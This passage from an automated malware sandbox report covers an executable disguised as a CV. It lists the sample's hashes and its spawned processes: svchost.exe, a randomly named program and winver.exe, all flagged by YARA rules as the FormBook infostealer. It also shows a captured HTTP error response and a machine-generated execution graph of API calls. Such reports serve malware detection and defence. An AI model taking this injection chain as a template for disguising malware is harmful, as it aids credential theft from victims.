                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1636&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=761&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 32 32 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                          Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and
                                                                                          Nov 24, 2024 08:23:19.515942097 CET106INData Raw: 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79
                                                                                          Data Ascii: Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                          Click to jump to process

                                                                                          Click to jump to process

                                                                                          Click to dive into process behavior distribution

                                                                                          Click to jump to process

                                                                                          Target ID:0
                                                                                          Start time:02:19:09
                                                                                          Start date:24/11/2024
                                                                                          Path:C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe"
                                                                                          Imagebase:0xc0000
                                                                                          File size:1'207'296 bytes
                                                                                          MD5 hash:12A282DC358949660691FBFF8BCDF461
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          Target ID:2
                                                                                          Start time:02:19:10
                                                                                          Start date:24/11/2024
                                                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe"
                                                                                          Imagebase:0xd0000
                                                                                          File size:46'504 bytes
                                                                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2388428467.00000000032E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2388123154.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2388832074.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:4
                                                                                          Start time:02:19:34
                                                                                          Start date:24/11/2024
                                                                                          Path:C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe"
                                                                                          Imagebase:0x490000
                                                                                          File size:140'800 bytes
                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4526133034.0000000002290000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          Target ID:5
                                                                                          Start time:02:19:38
                                                                                          Start date:24/11/2024
                                                                                          Path:C:\Windows\SysWOW64\winver.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\SysWOW64\winver.exe"
                                                                                          Imagebase:0x890000
                                                                                          File size:57'344 bytes
                                                                                          MD5 hash:B5471B0FB5402FC318C82C994C6BF84D
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4524870998.0000000000810000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4524992945.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4524586878.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:moderate
                                                                                          Has exited:false

                                                                                          Target ID:6
                                                                                          Start time:02:19:49
                                                                                          Start date:24/11/2024
                                                                                          Path:C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe"
                                                                                          Imagebase:0x490000
                                                                                          File size:140'800 bytes
                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4528088179.0000000004DD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          Target ID:8
                                                                                          Start time:02:20:01
                                                                                          Start date:24/11/2024
                                                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                          Imagebase:0x7ff79f9e0000
                                                                                          File size:676'768 bytes
                                                                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Reset < >

                                                                                            Execution Graph

                                                                                            Execution Coverage:3.9%
                                                                                            Dynamic/Decrypted Code Coverage:0.4%
                                                                                            Signature Coverage:8.4%
                                                                                            Total number of Nodes:2000
                                                                                            Total number of Limit Nodes:160
                                                                                            execution_graph 94308 1b26a90 94322 1b246e0 94308->94322 94310 1b26b28 94325 1b26980 94310->94325 94328 1b27b50 GetPEB 94322->94328 94324 1b24d6b 94324->94310 94326 1b26989 Sleep 94325->94326 94327 1b26997 94326->94327 94329 1b27b7a 94328->94329 94329->94324 94330 e5dfd 94331 e5e09 __setmbcp 94330->94331 94367 e7eeb GetStartupInfoW 94331->94367 94333 e5e0e 94369 e9ca7 GetProcessHeap 94333->94369 94335 e5e66 94338 e5e71 94335->94338 94454 e5f4d 47 API calls 3 library calls 94335->94454 94370 e7b47 94338->94370 94339 e5e77 94340 e5e82 __RTC_Initialize 94339->94340 94455 e5f4d 47 API calls 3 library calls 94339->94455 94391 eacb3 94340->94391 94343 e5e91 94344 e5e9d GetCommandLineW 94343->94344 94456 e5f4d 47 API calls 3 library calls 94343->94456 94410 f2e7d GetEnvironmentStringsW 94344->94410 94347 e5e9c 94347->94344 94351 e5ec2 94423 f2cb4 94351->94423 94354 e5ec8 94355 e5ed3 94354->94355 94458 e115b 47 API calls 3 library calls 94354->94458 94437 e1195 94355->94437 94358 e5edb 94359 e5ee6 __wwincmdln 94358->94359 94459 e115b 47 API calls 3 library calls 94358->94459 94441 c3a0f 94359->94441 94362 e5efa 94363 e5f09 94362->94363 94460 e13f1 47 API calls _doexit 94362->94460 94461 e1186 47 API calls _doexit 94363->94461 94366 e5f0e __setmbcp 94368 e7f01 94367->94368 94368->94333 94369->94335 94462 e123a 30 API calls 2 library calls 94370->94462 94372 e7b4c 94463 e7e23 InitializeCriticalSectionAndSpinCount 94372->94463 94374 e7b51 94375 e7b55 94374->94375 94465 e7e6d TlsAlloc 94374->94465 94464 e7bbd 50 API calls 2 library calls 94375->94464 94378 e7b5a 94378->94339 94379 e7b67 94379->94375 94380 e7b72 94379->94380 94466 e6986 94380->94466 94383 e7bb4 94474 e7bbd 50 API calls 2 library calls 94383->94474 94386 e7bb9 94386->94339 94387 e7b93 94387->94383 94388 e7b99 94387->94388 94473 e7a94 47 API calls 4 library calls 94388->94473 94390 e7ba1 GetCurrentThreadId 94390->94339 94392 eacbf __setmbcp 94391->94392 94483 e7cf4 94392->94483 94394 eacc6 94395 e6986 __calloc_crt 47 API calls 94394->94395 94397 eacd7 94395->94397 94396 ead42 GetStartupInfoW 94404 eae80 94396->94404 94407 ead57 94396->94407 94397->94396 94398 eace2 @_EH4_CallFilterFunc@8 __setmbcp 94397->94398 94398->94343 94399 eaf44 94490 eaf58 LeaveCriticalSection _doexit 94399->94490 94401 eaec9 GetStdHandle 94401->94404 94402 e6986 __calloc_crt 47 API calls 94402->94407 94403 eaedb GetFileType 94403->94404 94404->94399 94404->94401 94404->94403 94406 eaf08 InitializeCriticalSectionAndSpinCount 94404->94406 94405 eada5 94405->94404 94408 eadd7 GetFileType 94405->94408 94409 eade5 InitializeCriticalSectionAndSpinCount 94405->94409 94406->94404 94407->94402 94407->94404 94407->94405 94408->94405 94408->94409 94409->94405 94411 f2e8e 94410->94411 94412 e5ead 94410->94412 94529 e69d0 47 API calls __crtCompareStringA_stat 94411->94529 94417 f2a7b GetModuleFileNameW 94412->94417 94415 f2eb4 ___crtGetEnvironmentStringsW 94416 f2eca FreeEnvironmentStringsW 94415->94416 94416->94412 94418 f2aaf _wparse_cmdline 94417->94418 94419 e5eb7 94418->94419 94420 f2ae9 94418->94420 94419->94351 94457 e115b 47 API calls 3 library calls 94419->94457 94530 e69d0 47 API calls __crtCompareStringA_stat 94420->94530 94422 f2aef _wparse_cmdline 94422->94419 94424 f2ccd __NMSG_WRITE 94423->94424 94428 f2cc5 94423->94428 94425 e6986 __calloc_crt 47 API calls 94424->94425 94433 f2cf6 __NMSG_WRITE 94425->94433 94426 f2d4d 94427 e1c9d _free 47 API calls 94426->94427 94427->94428 94428->94354 94429 e6986 __calloc_crt 47 API calls 94429->94433 94430 f2d72 94432 e1c9d _free 47 API calls 94430->94432 94432->94428 94433->94426 94433->94428 94433->94429 94433->94430 94434 f2d89 94433->94434 94531 f2567 47 API calls 2 library calls 94433->94531 94532 e6e20 IsProcessorFeaturePresent 94434->94532 94436 f2d95 94436->94354 94438 e11a1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 94437->94438 94440 e11e0 __IsNonwritableInCurrentImage 94438->94440 94555 e0f0a 52 API calls __cinit 94438->94555 94440->94358 94442 131ebf 94441->94442 94443 c3a29 94441->94443 94444 c3a63 IsThemeActive 94443->94444 94556 e1405 94444->94556 94448 c3a8f 94568 c3adb SystemParametersInfoW SystemParametersInfoW 94448->94568 94450 c3a9b 94569 c3d19 94450->94569 94452 c3aa3 SystemParametersInfoW 94453 c3ac8 94452->94453 94453->94362 94454->94338 94455->94340 94456->94347 94460->94363 94461->94366 94462->94372 94463->94374 94464->94378 94465->94379 94469 e698d 94466->94469 94468 e69ca 94468->94383 94472 e7ec9 TlsSetValue 94468->94472 94469->94468 94470 e69ab Sleep 94469->94470 94475 f30aa 94469->94475 94471 e69c2 94470->94471 94471->94468 94471->94469 94472->94387 94473->94390 94474->94386 94476 f30b5 94475->94476 94481 f30d0 __calloc_impl 94475->94481 94477 f30c1 94476->94477 94476->94481 94482 e7c0e 47 API calls __getptd_noexit 94477->94482 94479 f30e0 HeapAlloc 94480 f30c6 94479->94480 94479->94481 94480->94469 94481->94479 94481->94480 94482->94480 94484 e7d18 EnterCriticalSection 94483->94484 94485 e7d05 94483->94485 94484->94394 94491 e7d7c 94485->94491 94487 e7d0b 94487->94484 94515 e115b 47 API calls 3 library calls 94487->94515 94490->94398 94492 e7d88 __setmbcp 94491->94492 94493 e7da9 94492->94493 94494 e7d91 94492->94494 94497 e7e11 __setmbcp 94493->94497 94509 e7da7 94493->94509 94516 e81c2 47 API calls __NMSG_WRITE 94494->94516 94496 e7d96 94517 e821f 47 API calls 5 library calls 94496->94517 94497->94487 94499 e7dbd 94501 e7dc4 94499->94501 94502 e7dd3 94499->94502 94520 e7c0e 47 API calls __getptd_noexit 94501->94520 94505 e7cf4 __lock 46 API calls 94502->94505 94503 e7d9d 94518 e1145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 94503->94518 94508 e7dda 94505->94508 94507 e7dc9 94507->94497 94510 e7dfe 94508->94510 94511 e7de9 InitializeCriticalSectionAndSpinCount 94508->94511 94509->94493 94519 e69d0 47 API calls __crtCompareStringA_stat 94509->94519 94521 e1c9d 94510->94521 94512 e7e04 94511->94512 94527 e7e1a LeaveCriticalSection _doexit 94512->94527 94516->94496 94517->94503 94519->94499 94520->94507 94522 e1ca6 RtlFreeHeap 94521->94522 94523 e1ccf _free 94521->94523 94522->94523 94524 e1cbb 94522->94524 94523->94512 94528 e7c0e 47 API calls __getptd_noexit 94524->94528 94526 e1cc1 GetLastError 94526->94523 94527->94497 94528->94526 94529->94415 94530->94422 94531->94433 94533 e6e2b 94532->94533 94538 e6cb5 94533->94538 94537 e6e46 94537->94436 94539 e6ccf _memset __call_reportfault 94538->94539 94540 e6cef IsDebuggerPresent 94539->94540 94546 e81ac SetUnhandledExceptionFilter UnhandledExceptionFilter 94540->94546 94543 e6dd6 94545 e8197 GetCurrentProcess TerminateProcess 94543->94545 94544 e6db3 __call_reportfault 94547 ea70c 94544->94547 94545->94537 94546->94544 94548 ea716 IsProcessorFeaturePresent 94547->94548 94549 ea714 94547->94549 94551 f37b0 94548->94551 94549->94543 94554 f375f 5 API calls 2 library calls 94551->94554 94553 f3893 94553->94543 94554->94553 94555->94440 94557 e7cf4 __lock 47 API calls 94556->94557 94558 e1410 94557->94558 94621 e7e58 LeaveCriticalSection 94558->94621 94560 c3a88 94561 e146d 94560->94561 94562 e1477 94561->94562 94563 e1491 94561->94563 94562->94563 94622 e7c0e 47 API calls __getptd_noexit 94562->94622 94563->94448 94565 e1481 94623 e6e10 8 API calls _wprintf 94565->94623 94567 e148c 94567->94448 94568->94450 94570 c3d26 __ftell_nolock 94569->94570 94624 cd7f7 94570->94624 94574 c3d57 IsDebuggerPresent 94575 131cc1 MessageBoxA 94574->94575 94576 c3d65 94574->94576 94578 131cd9 94575->94578 94576->94578 94579 c3d82 94576->94579 94607 c3e3a 94576->94607 94577 c3e41 SetCurrentDirectoryW 94580 c3e4e Mailbox 94577->94580 94826 dc682 48 API calls 94578->94826 94703 c40e5 94579->94703 94580->94452 94584 131ce9 94588 131cff SetCurrentDirectoryW 94584->94588 94585 c3da0 GetFullPathNameW 94719 c6a63 94585->94719 94587 c3ddb 94730 c6430 94587->94730 94588->94580 94591 c3df6 94592 c3e00 94591->94592 94827 1071fa AllocateAndInitializeSid CheckTokenMembership FreeSid 94591->94827 94746 c3e6e GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 94592->94746 94595 131d1c 94595->94592 94598 131d2d 94595->94598 94828 c5374 94598->94828 94599 c3e0a 94601 c3e1f 94599->94601 94754 c4ffc 94599->94754 94764 ce8d0 94601->94764 94602 131d35 94835 cce19 94602->94835 94607->94577 94608 131d42 94610 131d49 94608->94610 94611 131d6e 94608->94611 94841 c518c 94610->94841 94612 c518c 48 API calls 94611->94612 94620 131d6a GetForegroundWindow ShellExecuteW 94612->94620 94618 131d9e Mailbox 94618->94607 94620->94618 94621->94560 94622->94565 94623->94567 94860 df4ea 94624->94860 94626 cd818 94627 df4ea 48 API calls 94626->94627 94628 c3d31 GetCurrentDirectoryW 94627->94628 94629 c61ca 94628->94629 94891 de99b 94629->94891 94633 c61eb 94634 c5374 50 API calls 94633->94634 94635 c61ff 94634->94635 94636 cce19 48 API calls 94635->94636 94637 c620c 94636->94637 94908 c39db 94637->94908 94639 c6216 Mailbox 94920 c6eed 94639->94920 94644 cce19 48 API calls 94645 c6244 94644->94645 94927 cd6e9 94645->94927 94647 c6254 Mailbox 94648 cce19 48 API calls 94647->94648 94649 c627c 94648->94649 94650 cd6e9 55 API calls 94649->94650 94651 c628f Mailbox 94650->94651 94652 cce19 48 API calls 94651->94652 94653 c62a0 94652->94653 94931 cd645 94653->94931 94655 c62b2 Mailbox 94656 cd7f7 48 API calls 94655->94656 94657 c62c5 94656->94657 94941 c63fc 94657->94941 94661 c62df 94662 c62e9 94661->94662 94663 131c08 94661->94663 94665 e0fa7 _W_store_winword 59 API calls 94662->94665 94664 c63fc 48 API calls 94663->94664 94666 131c1c 94664->94666 94667 c62f4 94665->94667 94669 c63fc 48 API calls 94666->94669 94667->94666 94668 c62fe 94667->94668 94670 e0fa7 _W_store_winword 59 API calls 94668->94670 94671 131c38 94669->94671 94672 c6309 94670->94672 94674 c5374 50 API calls 94671->94674 94672->94671 94673 c6313 94672->94673 94675 e0fa7 _W_store_winword 59 API calls 94673->94675 94676 131c5d 94674->94676 94677 c631e 94675->94677 94679 c63fc 48 API calls 94676->94679 94678 c635f 94677->94678 94680 131c86 94677->94680 94683 c63fc 48 API calls 94677->94683 94678->94680 94681 c636c 94678->94681 94682 131c69 94679->94682 94684 c6eed 48 API calls 94680->94684 94957 dc050 94681->94957 94685 c6eed 48 API calls 94682->94685 94686 c6342 94683->94686 94687 131ca8 94684->94687 94689 131c77 94685->94689 94690 c6eed 48 API calls 94686->94690 94691 c63fc 48 API calls 94687->94691 94693 c63fc 48 API calls 94689->94693 94694 c6350 94690->94694 94695 131cb5 94691->94695 94692 c6384 94968 d1b90 94692->94968 94693->94680 94697 c63fc 48 API calls 94694->94697 94695->94695 94697->94678 94698 d1b90 48 API calls 94699 c6394 94698->94699 94699->94698 94701 c63fc 48 API calls 94699->94701 94702 c63d6 Mailbox 94699->94702 94984 c6b68 48 API calls 94699->94984 94701->94699 94702->94574 94704 c40f2 __ftell_nolock 94703->94704 94705 c410b 94704->94705 94706 13370e _memset 94704->94706 95493 c660f 94705->95493 94709 13372a GetOpenFileNameW 94706->94709 94711 133779 94709->94711 94712 c6a63 48 API calls 94711->94712 94714 13378e 94712->94714 94714->94714 94716 c4129 95518 c4139 94716->95518 94720 c6adf 94719->94720 94723 c6a6f __NMSG_WRITE 94719->94723 94721 cb18b 48 API calls 94720->94721 94722 c6ab6 ___crtGetEnvironmentStringsW 94721->94722 94722->94587 94724 c6a8b 94723->94724 94725 c6ad7 94723->94725 95728 c6b4a 94724->95728 95731 cc369 48 API calls 94725->95731 94728 c6a95 94729 dee75 48 API calls 94728->94729 94729->94722 94731 c643d __ftell_nolock 94730->94731 95732 c4c75 94731->95732 94733 c6442 94745 c3dee 94733->94745 95743 c5928 86 API calls 94733->95743 94735 c644f 94735->94745 95744 c5798 88 API calls Mailbox 94735->95744 94737 c6458 94738 c645c GetFullPathNameW 94737->94738 94737->94745 94739 c6a63 48 API calls 94738->94739 94740 c6488 94739->94740 94741 c6a63 48 API calls 94740->94741 94742 c6495 94741->94742 94743 135dcf _wcscat 94742->94743 94744 c6a63 48 API calls 94742->94744 94744->94745 94745->94584 94745->94591 94747 c3ed8 94746->94747 94748 131cba 94746->94748 95795 c4024 94747->95795 94752 c3e05 94753 c36b8 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 94752->94753 94753->94599 94755 c5027 _memset 94754->94755 95800 c4c30 94755->95800 94758 c50ac 94760 c50ca Shell_NotifyIconW 94758->94760 94761 133d28 Shell_NotifyIconW 94758->94761 95804 c51af 94760->95804 94763 c50df 94763->94601 94765 ce8f6 94764->94765 94823 ce906 Mailbox 94764->94823 94766 ced52 94765->94766 94765->94823 95999 de3cd 335 API calls 94766->95999 94768 c3e2a 94768->94607 94825 c3847 Shell_NotifyIconW _memset 94768->94825 94770 ced63 94770->94768 94771 ced70 94770->94771 96001 de312 335 API calls Mailbox 94771->96001 94772 ce94c PeekMessageW 94772->94823 94774 13526e Sleep 94774->94823 94775 ced77 LockWindowUpdate DestroyWindow GetMessageW 94775->94768 94777 ceda9 94775->94777 94779 1359ef TranslateMessage DispatchMessageW GetMessageW 94777->94779 94778 cebc7 94778->94768 96000 c2ff6 16 API calls 94778->96000 94779->94779 94781 135a1f 94779->94781 94781->94768 94782 ced21 PeekMessageW 94782->94823 94783 cebf7 timeGetTime 94783->94823 94785 df4ea 48 API calls 94785->94823 94786 c6eed 48 API calls 94786->94823 94787 ced3a TranslateMessage DispatchMessageW 94787->94782 94788 135557 WaitForSingleObject 94790 135574 GetExitCodeProcess CloseHandle 94788->94790 94788->94823 94789 13588f Sleep 94817 135429 Mailbox 94789->94817 94790->94823 94791 cd7f7 48 API calls 94791->94817 94792 cedae timeGetTime 96002 c1caa 49 API calls 94792->96002 94793 135733 Sleep 94793->94817 94794 ddc38 timeGetTime 94794->94817 94798 135926 GetExitCodeProcess 94801 135952 CloseHandle 94798->94801 94802 13593c WaitForSingleObject 94798->94802 94800 135445 Sleep 94800->94823 94801->94817 94802->94801 94802->94823 94803 135432 Sleep 94803->94800 94804 128c4b 108 API calls 94804->94817 94805 c2c79 107 API calls 94805->94817 94807 1359ae Sleep 94807->94823 94808 c1caa 49 API calls 94808->94823 94810 cce19 48 API calls 94810->94817 94814 cd6e9 55 API calls 94814->94817 94817->94791 94817->94794 94817->94798 94817->94800 94817->94803 94817->94804 94817->94805 94817->94807 94817->94810 94817->94814 94817->94823 96004 104cbe 49 API calls Mailbox 94817->96004 96005 c1caa 49 API calls 94817->96005 96006 c2aae 335 API calls 94817->96006 96036 11ccb2 50 API calls 94817->96036 96037 107a58 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 94817->96037 96038 106532 63 API calls 3 library calls 94817->96038 94819 cd6e9 55 API calls 94819->94823 94820 10cc5c 86 API calls 94820->94823 94822 cce19 48 API calls 94822->94823 94823->94772 94823->94774 94823->94778 94823->94782 94823->94783 94823->94785 94823->94786 94823->94787 94823->94788 94823->94789 94823->94792 94823->94793 94823->94800 94823->94808 94823->94817 94823->94819 94823->94820 94823->94822 94824 c2aae 311 API calls 94823->94824 95827 cef00 94823->95827 95834 cf110 94823->95834 95899 d45e0 94823->95899 95916 de244 94823->95916 95921 ddc5f 94823->95921 95926 ceed0 335 API calls Mailbox 94823->95926 95927 d3200 94823->95927 96003 128d23 48 API calls 94823->96003 96007 cfe30 94823->96007 94824->94823 94825->94607 94826->94584 94827->94595 94829 ef8a0 __ftell_nolock 94828->94829 94830 c5381 GetModuleFileNameW 94829->94830 94831 cce19 48 API calls 94830->94831 94832 c53a7 94831->94832 94833 c660f 49 API calls 94832->94833 94834 c53b1 Mailbox 94833->94834 94834->94602 94836 cce28 __NMSG_WRITE 94835->94836 94837 dee75 48 API calls 94836->94837 94838 cce50 ___crtGetEnvironmentStringsW 94837->94838 94839 df4ea 48 API calls 94838->94839 94840 cce66 94839->94840 94840->94608 94842 c5197 94841->94842 94843 c519f 94842->94843 94844 131ace 94842->94844 96335 c5130 94843->96335 94845 c6b4a 48 API calls 94844->94845 94848 131adb __NMSG_WRITE 94845->94848 94847 c51aa 94851 c510d 94847->94851 94849 dee75 48 API calls 94848->94849 94850 131b07 ___crtGetEnvironmentStringsW 94849->94850 94852 c511f 94851->94852 94853 131be7 94851->94853 96345 cb384 94852->96345 96354 fa58f 48 API calls ___crtGetEnvironmentStringsW 94853->96354 94856 c512b 94857 131bf1 94863 df4f2 __calloc_impl 94860->94863 94862 df50c 94862->94626 94863->94862 94864 df50e std::exception::exception 94863->94864 94869 e395c 94863->94869 94883 e6805 RaiseException 94864->94883 94866 df538 94884 e673b 47 API calls _free 94866->94884 94868 df54a 94868->94626 94870 e39d7 __calloc_impl 94869->94870 94880 e3968 __calloc_impl 94869->94880 94890 e7c0e 47 API calls __getptd_noexit 94870->94890 94871 e3973 94871->94880 94885 e81c2 47 API calls __NMSG_WRITE 94871->94885 94886 e821f 47 API calls 5 library calls 94871->94886 94887 e1145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 94871->94887 94874 e399b RtlAllocateHeap 94875 e39cf 94874->94875 94874->94880 94875->94863 94877 e39c3 94888 e7c0e 47 API calls __getptd_noexit 94877->94888 94880->94871 94880->94874 94880->94877 94881 e39c1 94880->94881 94889 e7c0e 47 API calls __getptd_noexit 94881->94889 94883->94866 94884->94868 94885->94871 94886->94871 94888->94881 94889->94875 94890->94875 94892 cd7f7 48 API calls 94891->94892 94893 c61db 94892->94893 94894 c6009 94893->94894 94895 c6016 __ftell_nolock 94894->94895 94896 c6a63 48 API calls 94895->94896 94900 c617c Mailbox 94895->94900 94898 c6048 94896->94898 94907 c607e Mailbox 94898->94907 94985 c61a6 94898->94985 94899 c614f 94899->94900 94901 cce19 48 API calls 94899->94901 94900->94633 94902 c6170 94901->94902 94904 c64cf 48 API calls 94902->94904 94903 cce19 48 API calls 94903->94907 94904->94900 94905 c61a6 48 API calls 94905->94907 94907->94899 94907->94900 94907->94903 94907->94905 94988 c64cf 94907->94988 95011 c41a9 94908->95011 94911 c3a06 94911->94639 94914 132ff0 94916 e1c9d _free 47 API calls 94914->94916 94917 132ffd 94916->94917 94918 c4252 84 API calls 94917->94918 94919 133006 94918->94919 94919->94919 94921 c6ef8 94920->94921 94922 c622b 94920->94922 95481 cdd47 48 API calls ___crtGetEnvironmentStringsW 94921->95481 94924 c9048 94922->94924 94925 df4ea 48 API calls 94924->94925 94926 c6237 94925->94926 94926->94644 94928 cd6f4 94927->94928 94930 cd71b 94928->94930 95482 cd764 55 API calls 94928->95482 94930->94647 94932 cd654 94931->94932 94940 cd67e 94931->94940 94933 cd65b 94932->94933 94936 cd6c2 94932->94936 94934 cd666 94933->94934 94939 cd6ab 94933->94939 95483 cd9a0 53 API calls __cinit 94934->95483 94936->94939 95485 ddce0 53 API calls 94936->95485 94939->94940 95484 ddce0 53 API calls 94939->95484 94940->94655 94942 c641f 94941->94942 94943 c6406 94941->94943 94945 c6a63 48 API calls 94942->94945 94944 c6eed 48 API calls 94943->94944 94946 c62d1 94944->94946 94945->94946 94947 e0fa7 94946->94947 94948 e1028 94947->94948 94949 e0fb3 94947->94949 95488 e103a 59 API calls 4 library calls 94948->95488 94956 e0fd8 94949->94956 95486 e7c0e 47 API calls __getptd_noexit 94949->95486 94952 e1035 94952->94661 94953 e0fbf 95487 e6e10 8 API calls _wprintf 94953->95487 94955 e0fca 94955->94661 94956->94661 94958 dc064 94957->94958 94960 dc069 Mailbox 94957->94960 95489 dc1af 48 API calls 94958->95489 94965 dc077 94960->94965 95490 dc15c 48 API calls 94960->95490 94962 df4ea 48 API calls 94964 dc108 94962->94964 94963 dc152 94963->94692 94966 df4ea 48 API calls 94964->94966 94965->94962 94965->94963 94967 dc113 94966->94967 94967->94692 94967->94967 94969 d1cf6 94968->94969 94972 d1ba2 94968->94972 94969->94699 94970 d1bae 94977 d1bb9 94970->94977 95492 dc15c 48 API calls 94970->95492 94972->94970 94973 df4ea 48 API calls 94972->94973 94974 1349c4 94973->94974 94975 df4ea 48 API calls 94974->94975 94983 1349cf 94975->94983 94976 d1c5d 94976->94699 94977->94976 94978 df4ea 48 API calls 94977->94978 94979 d1c9f 94978->94979 94980 d1cb2 94979->94980 95491 c2925 48 API calls 94979->95491 94980->94699 94982 df4ea 48 API calls 94982->94983 94983->94970 94983->94982 94984->94699 94994 cbdfa 94985->94994 94987 c61b1 94987->94898 94989 c651b 94988->94989 94993 c64dd ___crtGetEnvironmentStringsW 